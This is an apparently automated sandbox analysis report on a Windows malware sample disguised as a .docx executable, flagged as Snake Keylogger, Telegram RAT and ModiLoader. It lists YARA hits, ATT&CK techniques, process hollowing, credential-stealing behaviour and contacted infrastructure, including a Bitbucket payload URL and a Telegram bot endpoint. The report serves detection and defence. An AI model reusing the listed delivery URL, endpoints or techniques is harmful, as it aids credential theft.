          Source: Yara matchFile source: 4.2.xzeheenC.pif.1e2f5570.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.36aa0000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xzeheenC.pif.1ce5b98e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.3092b98e.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.30ca0f08.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.3.xzeheenC.pif.2ed4e980.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.35555570.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.342cb98e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.xzeheenC.pif.31d75570.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.35555570.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.xzeheenC.pif.35556478.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3474258234.0000000035551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2246468592.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3471014628.000000003428B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.2424661790.000000002ED4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3472612070.00000000330F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3475804863.00000000370D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3471453220.0000000031D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3471183670.000000001E2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000003.2351649309.0000000032623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468030849.00000000308EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D423000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D393000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468608975.0000000030E4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D547000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D37F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468608975.0000000030F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3471546461.000000003475D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3471546461.000000003461A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D3F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 6656, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 432, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 2140, type: MEMORYSTR
          Yara detected Telegram RAT
          Source: Yara matchFile source: 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 6656, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 432, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 2140, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Valid Accounts          		1
          Native API          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services11
          Archive Collected Data          		1
          Web Service          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules          		1
          Valid Accounts          		1
          Valid Accounts          		11
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          System Network Connections Discovery          		Remote Desktop Protocol1
          Data from Local System          		1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter          		1
          Registry Run Keys / Startup Folder          		1
          Access Token Manipulation          		3
          Obfuscated Files or Information          		Security Account Manager1
          File and Directory Discovery          		SMB/Windows Admin Shares1
          Email Collection          		11
          Encrypted Channel          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook311
          Process Injection          		3
          Software Packing          		NTDS36
          System Information Discovery          		Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          Registry Run Keys / Startup Folder          		1
          Timestomp          		LSA Secrets341
          Security Software Discovery          		SSHKeylogging114
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials41
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
          Masquerading          		DCSync2
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Valid Accounts          		Proc Filesystem1
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Access Token Manipulation          		/etc/passwd and /etc/shadow1
          System Network Configuration Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
          Virtualization/Sandbox Evasion          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
          Process Injection          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577649 Sample: D.G Governor Istek,Docx.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 49 api.telegram.org 2->49 51 s3-w.us-east-1.amazonaws.com 2->51 53 5 other IPs or domains 2->53 67 Suricata IDS alerts for network traffic 2->67 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 75 18 other signatures 2->75 8 D.G Governor Istek,Docx.exe 1 10 2->8         started        13 Cneehezx.PIF 6 2->13         started        15 Cneehezx.PIF 2->15         started        signatures3 73 Uses the Telegram API (likely for C&C communication) 49->73 process4 dnsIp5 55 bitbucket.org 185.166.143.49, 443, 49714, 49715 AMAZON-02US Germany 8->55 57 s3-w.us-east-1.amazonaws.com 52.217.32.148, 443, 49716 AMAZON-02US United States 8->57 37 C:\Users\Public\Libraries\xzeheenC.pif, PE32 8->37 dropped 39 C:\Users\Public\Libraries\Cneehezx.PIF, PE32 8->39 dropped 41 C:\Users\Public\Libraries\FX.cmd, DOS 8->41 dropped 43 2 other malicious files 8->43 dropped 77 Writes to foreign memory regions 8->77 79 Allocates memory in foreign processes 8->79 81 Sample uses process hollowing technique 8->81 17 xzeheenC.pif 15 2 8->17         started        21 cmd.exe 1 8->21         started        83 Antivirus detection for dropped file 13->83 85 Multi AV Scanner detection for dropped file 13->85 87 Sample is not signed and drops a device driver 13->87 23 xzeheenC.pif 2 13->23         started        25 cmd.exe 13->25         started        89 Allocates many large memory junks 15->89 27 xzeheenC.pif 15->27         started        29 cmd.exe 15->29         started        file6 signatures7 process8 dnsIp9 45 checkip.dyndns.com 132.226.247.73, 49731, 49759, 49775 UTMEMUS United States 17->45 47 api.telegram.org 149.154.167.220, 443, 49758, 49782 TELEGRAMRU United Kingdom 17->47 59 Detected unpacking (changes PE section rights) 17->59 61 Detected unpacking (overwrites its own PE header) 17->61 63 Tries to steal Mail credentials (via file / registry access) 17->63 31 conhost.exe 21->31         started        33 conhost.exe 25->33         started        65 Tries to harvest and steal browser information (history, passwords, etc) 27->65 35 conhost.exe 29->35         started        signatures10 process11

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          D.G Governor Istek,Docx.exe53%ReversingLabsWin32.Trojan.ModiLoader
          D.G Governor Istek,Docx.exe100%AviraHEUR/AGEN.1326111

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\Libraries\Cneehezx.PIF100%AviraHEUR/AGEN.1326111
          C:\Users\Public\Libraries\Cneehezx.PIF53%ReversingLabsWin32.Trojan.ModiLoader
          C:\Users\Public\Libraries\xzeheenC.pif3%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://checkip.dyndns.P0%Avira URL Cloudsafe
          http://ocsp.sectigo.com0C0%Avira URL Cloudsafe
          http://www.pmail.com00%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          s3-w.us-east-1.amazonaws.com
          		52.217.32.148
          		truefalse
            		high
            bitbucket.org
            		185.166.143.49
            		truefalse
              		high
              api.telegram.org
              		149.154.167.220
              		truefalse
                		high
                checkip.dyndns.com
                		132.226.247.73
                		truefalse
                  		high
                  bbuseruploads.s3.amazonaws.com
                  		unknown
                  		unknownfalse
                    		high
                    checkip.dyndns.org
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzjfalse
                        		high
                        http://checkip.dyndns.org/false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netD.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://sectigo.com/CPS0D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                https://api.telegram.orgxzeheenC.pif, 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D423000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D547000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.000000003475D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030F7F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    http://ocsp.sectigo.com0D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.org/botxzeheenC.pif, 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D393000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D547000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D37F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D3F5000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.000000003475D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.000000003461A000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E4B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030F7F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://web-security-reports.services.atlassian.com/csp-report/bb-websiteD.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://bitbucket.org/ntim1478/gpmaw/dowD.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.000000002090D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netD.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://dz8aopenkvv6s.cloudfront.netD.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://remote-app-switcher.prod-east.frontend.public.atl-paas.netD.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netD.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.00000000007DC000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://checkip.dyndns.org/pxzeheenC.pif, 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://cdn.cookielaw.org/D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://checkip.dyndns.PxzeheenC.pif, 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://aui-cdn.atlassian.com/D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://remote-app-switcher.stg-east.frontend.public.atl-paas.netD.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://api.telegram.orgxzeheenC.pif, 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D423000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D393000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D547000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D65F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D3F5000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.000000003475D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030F7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namexzeheenC.pif, 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://bitbucket.org/)_D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.00000000007B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://bbuseruploads.s3.amazonaws.com/D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.00000000007DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://ocsp.sectigo.com0CD.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
